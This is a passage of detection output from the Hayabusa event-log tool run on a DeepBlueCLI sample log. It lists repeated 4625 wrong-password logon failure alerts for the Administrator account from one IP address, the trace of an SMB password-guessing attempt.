NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: 